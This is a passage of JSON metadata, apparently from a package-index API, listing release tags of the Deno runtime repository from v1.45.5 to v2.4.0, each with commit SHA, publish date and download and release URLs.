mmit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url"